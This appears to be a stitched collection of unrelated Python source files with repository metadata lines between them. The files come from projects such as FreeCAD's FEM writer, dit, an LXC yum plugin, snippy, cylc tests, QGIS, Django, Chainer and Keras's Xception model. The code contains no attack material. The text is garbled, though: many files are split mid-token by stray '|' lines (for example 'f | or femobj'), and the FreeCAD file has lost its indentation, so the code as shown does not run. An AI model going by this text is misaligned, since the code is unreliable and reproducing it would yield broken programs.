__title__ = "FemInputWriter"
__author__ = "Bernd Hahnebach"
__url__ = "http://www.freecadweb.org"
import FreeCAD
import FemMeshTools
import os
class FemInputWriter():
def __init__(self,
analysis_obj, solver_obj,
mesh_obj, matlin_obj, matnonlin_obj,
fixed_obj, displacement_obj,
contact_obj, planerotation_obj, transform_obj,
selfweight_obj, force_obj, pressure_obj,
temperature_obj, heatflux_obj, initialtemperature_obj,
beamsection_obj, shellthickness_obj,
analysis_type, dir_name
):
self.analysis = analysis_obj
self.solver_obj = solver_obj
self.mesh_object = mesh_obj
self.material_objects = matlin_obj
self.material_nonlinear_objects = matnonlin_obj
self.fixed_objects = fixed_obj
self.displacement_objects = displacement_obj
self.contact_objects = contact_obj
self.planerotation_objects = planerotation_obj
self.transform_objects = transform_obj
self.selfweight_objects = selfweight_obj
self.force_objects = force_obj
self.pressure_objects = pressure_obj
self.temperature_objects = temperature_obj
self.heatflux_objects = heatflux_obj
self.initialtemperature_objects = initialtemperature_obj
self.beamsection_objects = beamsection_obj
self.shellthickness_objects = shellthickness_obj
self.analysis_type = analysis_type
self.dir_name = dir_name
if not dir_name:
print('Error: FemInputWriter has no working_dir --> we gone make a temporary one!')
self.dir_name = FreeCAD.ActiveDocument.TransientDir.replace('\\', '/') + '/FemAnl_' + analysis_obj.Uid[-4:]
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
self.fc_ver = FreeCAD.Version()
self.ccx_eall = 'Eall'
self.ccx_elsets = []
self.femmesh = self.mesh_object.FemMesh
self.femnodes_mesh = {}
self.femelement_table = {}
self.constraint_conflict_nodes = []
def get_constraints_fixed_nodes(self):
# get nodes
for femobj in self.fixed_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_displacement_nodes(self):
# get nodes
for femobj in self.displacement_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_planerotation_nodes(self)
|
:
# get nodes
for femobj in self.planerotation_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_transform_nodes(self):
# get nodes
f
|
or femobj in self.transform_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_temperature_nodes(self):
# get nodes
for femobj in self.temperature_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_force_nodeloads(self):
# check shape type of reference shape
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
# in GUI defined frc_obj all ref_shape have the same shape type
# TODO in FemTools: check if all RefShapes really have the same type an write type to dictionary
femobj['RefShapeType'] = ''
if frc_obj.References:
first_ref_obj = frc_obj.References[0]
first_ref_shape = first_ref_obj[0].Shape.getElement(first_ref_obj[1][0])
femobj['RefShapeType'] = first_ref_shape.ShapeType
else:
# frc_obj.References could be empty ! # TODO in FemTools: check
FreeCAD.Console.PrintError('At least one Force Object has empty References!\n')
if femobj['RefShapeType'] == 'Vertex':
# print("load on vertices --> we do not need the femelement_table and femnodes_mesh for node load calculation")
pass
elif femobj['RefShapeType'] == 'Face' and FemMeshTools.is_solid_femmesh(self.femmesh) and not FemMeshTools.has_no_face_data(self.femmesh):
# print("solid_mesh with face data --> we do not need the femelement_table but we need the femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
else:
# print("mesh without needed data --> we need the femelement_table and femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
if not self.femelement_table:
self.femelement_table = FemMeshTools.get_femelement_table(self.femmesh)
# get node loads
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
if frc_obj.Force == 0:
print(' Warning --> Force = 0')
if
|
chebee7i/dit
|
dit/other/extropy.py
|
Python
|
bsd-3-clause
| 2,122
| 0.000471
|
"""
The extropy
"""
from ..helpers import RV_MODES
from ..math.ops import get_ops
import numpy as np
def extropy(dist, rvs=None, rv_mode=None):
"""
Returns the extropy J[X] over the random variables in `rvs`.
If the distribution represents linear probabilities, then the extropy
is calculated with units of 'bits' (base-2).
Parameters
----------
dist : Distribution or float
The distribution from which the extropy is calculated. If a float,
then we calculate the binary extropy.
rvs : list, None
The indexes of the random variable use
|
d to calculate the extropy.
If None, then the extropy is calculated over all random variables.
This should remain `None` for ScalarDistributions.
rv_mode : str, None
Specifies how to interpret the elements of `rvs`. Valid options are:
{'indices', 'names'}. If equal to 'indices', then the elements of
`rvs` are interpreted as random variable indices. If equal
|
to 'names',
the the elements are interpreted as random variable names. If `None`,
then the value of `dist._rv_mode` is consulted.
Returns
-------
J : float
The extropy of the distribution.
"""
try:
# Handle binary extropy.
float(dist)
except TypeError:
pass
else:
# Assume linear probability for binary extropy.
import dit
dist = dit.ScalarDistribution([dist, 1-dist])
rvs = None
rv_mode = RV_MODES.INDICES
if dist.is_joint():
if rvs is None:
# Set to entropy of entire distribution
rvs = list(range(dist.outcome_length()))
rv_mode = RV_MODES.INDICES
d = dist.marginal(rvs, rv_mode=rv_mode)
else:
d = dist
pmf = d.pmf
if d.is_log():
base = d.get_base(numerical=True)
npmf = d.ops.log(1-d.ops.exp(pmf))
terms = -base**npmf * npmf
else:
# Calculate entropy in bits.
log = get_ops(2).log
npmf = 1 - pmf
terms = -npmf * log(npmf)
J = np.nansum(terms)
return J
|
czchen/debian-lxc
|
config/yum/lxc-patch.py
|
Python
|
lgpl-2.1
| 1,850
| 0.000541
|
# Yum plugin to re-patch container rootfs after a yum update is done
#
# Copyright (C) 2012 O
|
racle
#
# Authors:
# Dwight Engen <dwight.engen@oracle.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the
|
Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import os
from fnmatch import fnmatch
from yum.plugins import TYPE_INTERACTIVE
from yum.plugins import PluginYumExit
requires_api_version = '2.0'
plugin_type = (TYPE_INTERACTIVE,)
def posttrans_hook(conduit):
pkgs = []
patch_required = False
# If we aren't root, we can't have updated anything
if os.geteuid():
return
# See what packages have files that were patched
confpkgs = conduit.confString('main', 'packages')
if not confpkgs:
return
tmp = confpkgs.split(",")
for confpkg in tmp:
pkgs.append(confpkg.strip())
conduit.info(2, "lxc-patch: checking if updated pkgs need patching...")
ts = conduit.getTsInfo()
for tsmem in ts.getMembers():
for pkg in pkgs:
if fnmatch(pkg, tsmem.po.name):
patch_required = True
if patch_required:
conduit.info(2, "lxc-patch: patching container...")
os.spawnlp(os.P_WAIT, "lxc-patch", "lxc-patch", "--patch", "/")
|
heilaaks/snippy
|
snippy/server/rest/api_fields.py
|
Python
|
agpl-3.0
| 3,524
| 0.000568
|
# -*- coding: utf-8 -*-
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
# snippy - software development and maintenance notes manager.
# Copyright 2017-2020 Heikki J. Laaksonen <laaksonen.heikki.j@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""api_fields: JSON REST API for resource attributes."""
from snippy.cause import Cause
from snippy.config.config import Config
from snippy.config.source.api import Api
from snippy.constants import Constants as Const
from snippy.logger import Logger
from snippy.server.rest.base import ApiResource
from snippy.server.rest.base import ApiNotImplemented
from snippy.server.rest.generate import Generate
class ApiAttributes(object):
"""Access unique resource attributes."""
def __init__(self, content):
self._logger = Logger.get_logger(__name__)
self._category = content.category
self._content = content
@Logger.timeit(refresh_oid=True)
def on_get(self, request, response):
"""Search unique resource attributes.
Search is made from all content categories by default.
Args:
request (obj): Falcon Request().
response (obj): Falcon Response().
"""
self._logger.debug('run: %s %s', request.method, request.uri)
if 'scat' not in request.params:
request.params['scat'] = Const.CATEGORIES
api = Api(self._category, Api.UNIQUE, request.params)
Config.load(api)
self._content.run()
if not self._content.uniques:
Cause.push(Cause.HTTP_NOT_FOUND, 'cannot find unique fields for %s attribute' % self._category)
if Cause.is_ok():
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.fields(self._category, self._content.uniques, request, response)
response.status = Cause.http_status()
else:
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.error(Cause.json_message())
response.status = Cause.h
|
ttp_status()
Cause.reset()
self._logger.debug('end: %s %s', request.method, request.uri)
@staticmethod
@Logger.
|
timeit(refresh_oid=True)
def on_post(request, response):
"""Create new field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_put(request, response):
"""Change field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_delete(request, response):
"""Delete field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_options(_, response):
"""Respond with allowed methods."""
response.status = Cause.HTTP_200
response.set_header('Allow', 'GET,OPTIONS')
|
oliver-sanders/cylc
|
tests/unit/parsec/test_validate.py
|
Python
|
gpl-3.0
| 21,599
| 0
|
# THIS FILE IS PART OF THE CYLC WORKFLOW ENGINE.
# Copyright (C) NIWA & British Crown (Met Office) & Contributors.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Unit Tests for cylc.flow.parsec.validate.ParsecValidator.coerce methods."""
from typing import List
import pytest
from pytest import approx
from cylc.flow.parsec.config import ConfigNode as Conf
from cylc.flow.parsec.OrderedDict import OrderedDictWithDefaults
from cylc.flow.parsec.exceptions import IllegalValueError
from cylc.flow.parsec.validate import (
CylcConfigValidator as VDR,
DurationFloat,
ListValueError,
IllegalItemError,
ParsecValidator,
parsec_validate
)
@pytest.fixture
def sample_spec():
with Conf('myconf') as myconf:
with Conf('section1'):
Conf('value1', default='')
Conf('value2', default='what?')
with Conf('section2'):
Conf('enabled', VDR.V_BOOLEAN)
with Conf('section3'):
Conf('title', default='default', options=['1', '2'])
Conf(
'amounts',
VDR.V_INTEGER_LIST,
default=[1, 2, 3],
# options=[[1, 2, 3]]
)
with Conf('entries'):
Conf('key')
Conf('value')
with Conf('<whatever>'):
Conf('section300000', default='')
Conf('ids', VDR.V_INTEGER_LIST)
return myconf
@pytest.fixture
def validator_invalid_values():
"""
Data provider or invalid values for parsec validator. All values must not
be null (covered elsewhere), and not dict's.
Possible invalid scenarios must include:
- cfg[key] is a list AND a value is not in list of the possible values
- OR
- cfg[key] is not a list AND cfg[key] not in the list of possible values
:return: a list with sets of tuples for the test parameters
:rtype: list
"""
values = []
# variables reused throughout
spec = None
msg = None
# set 1 (t, f, f, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER_L
|
IST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 3"
msg = None
values.append((spec, cfg, msg))
# set 2 (t, t, f, t)
with Conf('base') as spec:
|
Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 5"
msg = '(type=option) value = [1, 2, 5]'
values.append((spec, cfg, msg))
# set 3 (f, f, t, f)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "2"
msg = None
values.append((spec, cfg, msg))
# set 4 (f, f, t, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "5"
msg = '(type=option) value = 5'
values.append((spec, cfg, msg))
return values
@pytest.fixture
def strip_and_unquote_list():
return [
[
'"a,b", c, "d e"', # input
["a,b", "c", "d e"] # expected
],
[
'foo bar baz', # input
["foo bar baz"] # expected
],
[
'"a", \'b\', c', # input
["a", "b", "c"] # expected
],
[
'a b c, d e f', # input
["a b c", "d e f"] # expected
],
]
def test_list_value_error():
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = ListValueError(keys, value, "who cares")
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (who cares)'
assert expected == output
def test_list_value_error_with_exception():
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = ListValueError(keys, value, "who cares", exc)
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (test: who cares)'
assert expected == output
def test_illegal_value_error():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = IllegalValueError(value_type, keys, value)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value"
assert expected == output
def test_illegal_value_error_with_exception():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = IllegalValueError(value_type, keys, value, exc)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value - (test)"
assert expected == output
def test_illegal_item_error():
keys = ['a,', 'b', 'c']
key = 'a sample value'
error = IllegalItemError(keys, key)
output = str(error)
expected = "[a,][b][c]a sample value"
assert expected == output
def test_illegal_item_error_message():
keys = ['a,', 'b', 'c']
key = 'a sample value'
message = "invalid"
error = IllegalItemError(keys, key, message)
output = str(error)
expected = "[a,][b][c]a sample value - (invalid)"
assert expected == output
def test_parsec_validator_invalid_key(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_no_spec(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
# remove the user-defined section from the spec
sample_spec._children = {
key: value
for key, value in sample_spec._children.items()
if key != '__MANY__'
}
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_with_many_spaces(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section 3000000'] = 'test'
with pytest.raises(IllegalItemError) as cm:
parsec_validator.validate(cfg, sample_spec)
assert str(cm.exception) == "section 3000000 - (consecutive spaces)"
def test_parsec_validator_invalid_key_with_many_invalid_values(
validator_invalid_values
):
for spec, cfg, msg in validator_invalid_values:
parsec_validator = ParsecValidator()
if msg is not None:
with pytest.raises(IllegalValueError) as cm:
parsec_validator.validate(cfg, spec)
assert msg == str(cm.value)
else:
# cylc.flow.parsec_validator.validate(cfg, spec)
# let's use the alias `parsec_validate` here
parsec_validate(cfg, spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator_invalid_key_with_many_1(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section3000000'] = OrderedDictWithDefaults()
par
|
erasche/python-apollo
|
arrow/commands/annotations/get_comments.py
|
Python
|
mit
| 652
| 0.001534
|
import click
from arrow.cli import pass_context, json_loads
from arrow.decorators im
|
port custom_exception, dict_output
@click.command('get_comments')
@click.argument("feature_id", type=str)
@click.option(
"--organism",
help="Organism Common Name",
type=str
)
@click.option(
"--sequence",
help="Sequence Name",
type=str
)
@pass_context
@custom_exception
@dict_output
def cli(ctx, feature_id, organism="", sequence=""):
"""Get a feature's comments
Output:
A stan
|
dard apollo feature dictionary ({"features": [{...}]})
"""
return ctx.gi.annotations.get_comments(feature_id, organism=organism, sequence=sequence)
|
nirvn/QGIS
|
python/plugins/processing/algs/qgis/SelectByAttribute.py
|
Python
|
gpl-2.0
| 5,528
| 0.001447
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByAttribute.py
---------------------
Date : May 2010
Copyright : (C) 2010 by Michael Minn
Email : pyqgis at michaelminn dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Minn'
__date__ = 'May 2010'
__copyright__ = '(C) 2010, Michael Minn'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt.QtCore import QVariant
from qgis.core import (QgsExpression,
QgsProcessingException,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterField,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingOutputVectorLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SelectByAttribute(QgisAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OPERATOR = 'OPERATOR'
VALUE = 'VALUE'
OUTPUT = 'OUTPUT'
OPERATORS = ['=',
'!=',
'>',
'>=',
'<',
'<=',
'begins with',
'contains',
'is null',
'is not null',
'does not contain'
]
STRING_OPERATORS = ['begins with',
'contains',
'does not contain']
def tags(self):
return self.tr('select,attribute,value,contains,null,field').split(',')
def group(self):
return self.tr('Vector selection')
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.i18n_operators = ['=',
'!=',
'>',
'>=',
'<',
'<=',
self.tr('begins with'),
self.tr('contains'),
self.tr('is null'),
self.tr('is not null'),
self.tr('does not contain')
]
self.addParameter(QgsProcessingParameterVectorLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterField(self.FIELD,
self.tr('Selection attribute'), parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterEnum(self.OPERATOR,
self.tr('Operator'), self.i18n_operators))
self.addParameter(QgsProcessingParameterString(self.VALUE, self.tr('Value')))
self.addOutput(QgsProcessingOutputVectorLayer(self.OUTPUT,
|
self.tr('Selected (attribute)')))
def name(self):
return 'selectbyattribute'
def displayName(self):
return self.tr('Select by attribute')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsVectorLayer(parameters, self.INPUT, context)
fieldNa
|
me = self.parameterAsString(parameters, self.FIELD, context)
operator = self.OPERATORS[self.parameterAsEnum(parameters, self.OPERATOR, context)]
value = self.parameterAsString(parameters, self.VALUE, context)
fields = layer.fields()
idx = layer.fields().lookupField(fieldName)
fieldType = fields[idx].type()
if fieldType != QVariant.String and operator in self.STRING_OPERATORS:
op = ''.join(['"%s", ' % o for o in self.STRING_OPERATORS])
raise QgsProcessingException(
self.tr('Operators {0} can be used only with string fields.').format(op))
field_ref = QgsExpression.quotedColumnRef(fieldName)
quoted_val = QgsExpression.quotedValue(value)
if operator == 'is null':
expression_string = '{} IS NULL'.format(field_ref)
elif operator == 'is not null':
expression_string = '{} IS NOT NULL'.format(field_ref)
elif operator == 'begins with':
expression_string = """%s LIKE '%s%%'""" % (field_ref, value)
elif operator == 'contains':
expression_string = """%s LIKE '%%%s%%'""" % (field_ref, value)
elif operator == 'does not contain':
expression_string = """%s NOT LIKE '%%%s%%'""" % (field_ref, value)
else:
expression_string = '{} {} {}'.format(field_ref, operator, quoted_val)
expression = QgsExpression(expression_string)
if expression.hasParserError():
raise QgsProcessingException(expression.parserErrorString())
layer.selectByExpression(expression_string)
return {self.OUTPUT: parameters[self.INPUT]}
|
soumith/convnet-benchmarks
|
chainer/vgga.py
|
Python
|
mit
| 1,463
| 0.001367
|
import chainer
import chainer.functions as F
import chainer.links as L
class vgga(chainer.Chain):
insize = 224
def __init__(self):
super(vgga, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D( 3, 64, 3, stride=1, pad=1)
self.conv2 =
|
L.Convolution2D( 64, 128, 3, stride=1, pad=1)
self.conv3 = L.Convolution2D(128, 256, 3, stride=1, pad=1)
sel
|
f.conv4 = L.Convolution2D(256, 256, 3, stride=1, pad=1)
self.conv5 = L.Convolution2D(256, 512, 3, stride=1, pad=1)
self.conv6 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv7 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv8 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.fc6 = L.Linear(512 * 7 * 7, 4096)
self.fc7 = L.Linear(4096, 4096)
self.fc8 = L.Linear(4096, 1000)
def forward(self, x):
h = F.max_pooling_2d(F.relu(self.conv1(x)), 2, stride=2)
h = F.max_pooling_2d(F.relu(self.conv2(h)), 2, stride=2)
h = F.relu(self.conv3(h))
h = F.max_pooling_2d(F.relu(self.conv4(h)), 2, stride=2)
h = F.relu(self.conv5(h))
h = F.max_pooling_2d(F.relu(self.conv6(h)), 2, stride=2)
h = F.relu(self.conv7(h))
h = F.max_pooling_2d(F.relu(self.conv8(h)), 2, stride=2)
h = F.relu(self.fc6(h))
h = F.relu(self.fc7(h))
return self.fc8(h)
|
cainmatt/django
|
tests/check_framework/test_urls.py
|
Python
|
bsd-3-clause
| 1,638
| 0.001832
|
from django.core.checks.urls import check_url_config
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckUrlsTest(SimpleTestCase):
@override_settings(ROOT_URLCONF='check_framework.urls_no_warnings')
def test_include_no_warnings(self):
result = check_url_config(None)
self.assertEqual(result, [])
@override_settings(ROOT_URLCONF='check_framework.urls_include')
def test_include_with_dollar(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W001')
expected_msg = "Your URL pattern '^include-with-dollar$' uses include with a regex ending with a '$'."
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_slash')
def test_url_beginning_with_slash(self):
resul
|
t = check_url_config(None)
self.assertEqual(len(
|
result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W002')
expected_msg = "Your URL pattern '/starting-with-slash/$' has a regex beginning with a '/'"
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_name')
def test_url_pattern_name_with_colon(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W003')
expected_msg = "Your URL pattern '^$' [name='name_with:colon'] has a name including a ':'."
self.assertIn(expected_msg, warning.msg)
|
mdpiper/csdms-wiki-api-examples
|
ask_api_examples/list_model_repo_doi.py
|
Python
|
mit
| 327
| 0
|
"""Find all models written by user Hutton, including the DOI and the
source code repository f
|
or each model.
"""
from ask_api_examples import make_query
query = '[[Last name::Hutton]]|?DOI model|?Source web address'
def main():
r = make_query(query, __fi
|
le__)
return r
if __name__ == '__main__':
print main()
|
bbenligiray/keras_models
|
not_used/xception.py
|
Python
|
mit
| 11,593
| 0.002156
|
# -*- coding: utf-8 -*-
"""Xception V1 model for Keras.
On ImageNet, this model gets to a top-1 validation accuracy of 0.790
and a top-5 validation accuracy of 0.945.
Do note that the input image format for this model is different than for
the VGG16 and ResNet models (299x299 instead of 224x224),
and that the input preprocessing function
is also different (same as Inception V3).
Also do note that this model is only available for the TensorFlow backend,
due to its reliance on `SeparableConvolution` layers.
# Reference
- [Xception: Deep Learning with Depthwise Separable Convolutions](https://arxiv.org/abs/1610.02357)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from ..models import Model
from .. import layers
from ..layers import Dense
from ..layers import Input
from ..layers import BatchNormalization
from ..layers import Activation
from ..layers import Conv2D
from ..layers import SeparableConv2D
from ..layers import MaxPooling2D
from ..layers import GlobalAveragePooling2D
from ..layers import GlobalMaxPooling2D
from ..engine.topology import get_source_inputs
from ..utils.data_utils import get_file
from .. import backend as K
from .imagenet_utils import decode_predictions
from .imagenet_utils import _obtain_input_shape
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels_notop.h5'
def Xception(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Xception architecture.
Optionally loads weights pre-trained
on ImageNet. This model is available for TensorFlow only,
and can only be used with inputs following the TensorFlow
data format `(width, height, channels)`.
You should set `image_data_format="channels_last"` in your Keras config
located at ~/.keras/keras.json.
Note that the default input image size for this model is 299x299.
# Arguments
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(299, 299, 3)`.
It should have exactly 3 inputs channels,
and width and height should be no smaller than 71.
E.g. `(150, 150, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
if K.backend() != 'tensorflow':
raise RuntimeError('The Xception model is only available with '
'the TensorFlow backend.')
if K.image_data_format() != 'channels_last':
warnings.warn('The Xception model is only available for the '
'input data format "channels_last" '
'(width, height, channels). '
'However your settings specify the default '
'data format "channels_first" (channels, width, height). '
'You should set `image_data_format="channels_last"` in your Keras '
'config located at ~/.keras/keras.json. '
'The model being returned right now will expect inputs '
'to follow the "channels_last" data format.')
K.set_image_data_format('channels_last')
old_data_format = 'channels_first'
else:
old_data_format = None
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=299,
min_size=71,
data_format=K.image_data_format(),
include_top=include_top)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
x = Conv2D(32, (3, 3), strides=(2, 2), use_bias=False, name='block1_conv1')(img_input)
x = BatchNormalization(name='block1_conv1_bn')(x)
x = Activation('relu', name='block1_conv1_act')(x)
x = Conv2D(64, (3, 3), use_bias=False, name='block1_conv2')(x)
x = BatchNormalization(name='block1_conv2_bn')(x)
x = Activation('relu', name='block1_conv2_act')(x)
residual = Conv2D(128, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv1')(x)
x = BatchNormalization(name='block2_sepconv1_bn')(x)
x = Activation('relu', name='block2_sepconv2_act')(x)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv2')(x)
x = BatchNormalization(name='block2_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block2_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), str
|
ides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block3_sepconv1_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same',
|
use_bias=False, name='block3_sepconv1')(x)
x = BatchNormalization(name='block3_sepconv1_bn')(x)
x = Activation('relu', name='block3_sepconv2_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv2')(x)
x = BatchNormalization(name='block3_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block3_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
